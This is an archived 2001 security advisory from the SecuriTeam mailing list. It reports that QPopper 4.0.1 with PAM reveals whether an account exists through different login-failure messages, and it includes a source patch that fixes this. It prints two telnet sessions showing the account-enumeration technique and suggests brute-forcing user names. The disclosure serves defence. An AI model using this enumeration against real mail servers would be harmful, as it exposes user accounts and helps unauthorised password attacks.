[UNIX] QPopper in Conjunction with PAM Allows Account Verification
From: support@securiteam.comDate: 09/02/01
- Previous message: support@securiteam.com: "[NEWS] Security Update for Bugzilla v2.13 and Older"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [UNIX] QPopper in Conjunction with PAM Allows Account Verification Message-Id: <20010902070517.DAED8138BF@mail.der-keiler.de> Date: Sun, 2 Sep 2001 09:05:17 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
QPopper in Conjunction with PAM Allows Account Verification
------------------------------------------------------------------------
SUMMARY
When QPopper is used in conjunction with PAM (authentication module), a
remote attacker is able to verify whether the remote host contains a
certain user name by checking the respond sent back when entering a
username and password combination.
DETAILS
Vulnerable systems:
QPopper version 4.0.1 with PAM
Example:
Existing account:
# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22975.998689264@target.host>
user validuser
+OK Password required for validuser.
pass valid
-ERR [AUTH] PAM authentication failed for user "validuser": Authentication
failure (7)
+OK Pop server at target.host signing off.
Connection closed by foreign host.
Non-existent account:
# telnet 10.10.10.1 110
Trying 10.10.10.1...
Connected to 10.10.10.1.
Escape character is '^]'.
+OK ready <22984.998689464@target.host>
user fakeuser
+OK Password required for fakeuser.
pass fakeeeee
-ERR [AUTH] Password supplied for "fakeuser" is incorrect.
+OK Pop server at target.host signing off.
Connection closed by foreign host.
If you look carefully for the differences between the two sessions, you
will see they give different auth fail responses. Using this, you can
brute force and verify whether an account exists or not.
Patch:
The following patch fixes this behavior:
---cut---
--- popper/pop_pass.c.orig Sat Aug 25 19:05:41 2001
+++ popper/pop_pass.c Sat Aug 25 19:06:58 2001
@@ -368,7 +368,7 @@
*/
static int gp_errcode = 0;
static char *GP_ERRSTRING =
- "[AUTH] PAM authentication failed for user \"%.100s\": %.128s
(%d)";
+ "[AUTH] Password supplied for \"%.100s\" is incorrect.";
static int
PAM_qpopper_conv ( int num_msg,
---cut---
ADDITIONAL INFORMATION
The information has been provided by <mailto:presto@tpgn.net> Charles
Chear.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Security Update for Bugzilla v2.13 and Older"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
